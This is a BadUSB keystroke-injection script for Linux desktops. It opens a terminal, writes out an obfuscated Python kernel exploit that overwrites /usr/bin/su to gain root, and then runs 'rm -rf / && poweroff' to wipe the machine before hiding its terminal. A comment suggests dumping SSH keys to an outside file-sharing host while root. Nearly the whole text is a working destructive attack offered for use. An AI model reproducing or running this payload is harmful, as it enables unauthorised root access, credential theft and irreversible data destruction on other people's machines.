REM This is BadUSB demo script for Linux/Gnome
REM #############################
REM ####### DANGER !! ###########
REM #############################
REM This script will wipe a linux machine unpatched to CVE-2026-31431
REM launch via GUI evokes terminal through 2 methods then runs attack and wipes root with rm rf

REM GUI launch terminal in kde gnome plasma
DELAY 500
GUI
STRING terminal
ENTER
DELAY 500

REM launch via hotkeys for terminal
DELAY 500
CTRL-ALT T
DELAY 200
ENTER
ENTER

REM Clear the screen in case some banner was displayed
STRING clear
ENTER

REM Bigger shell script example
STRING cat > /tmp/cve.py << EOF
ENTER

STRING #!/usr/bin/env python3
ENTER
STRING import os as g,zlib,socket as s
ENTER
STRING def d(x):return bytes.fromhex(x)
ENTER
STRING def c(f,t,c):
ENTER
STRING  a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
ENTER
STRING  try:u.recv(8+t)
ENTER
STRING  except:0
ENTER
STRING f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
ENTER
STRING while i<len(e):c(f,i,e[i:i+4]);i+=4
ENTER
STRING g.system("su")
ENTER
ENTER
STRING EOF
ENTER

REM Run exploit command
STRING python3 /tmp/cve.py
ENTER
DELAY 200

REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/ 
REM clean up after

STRING rm -rf / && poweroff > /dev/null 2>&1 &
ENTER

REM detach from the process and close terminal to hide
DELAY 200
STRING disown
ENTER
DELAY 200
STRING exit
ENTER
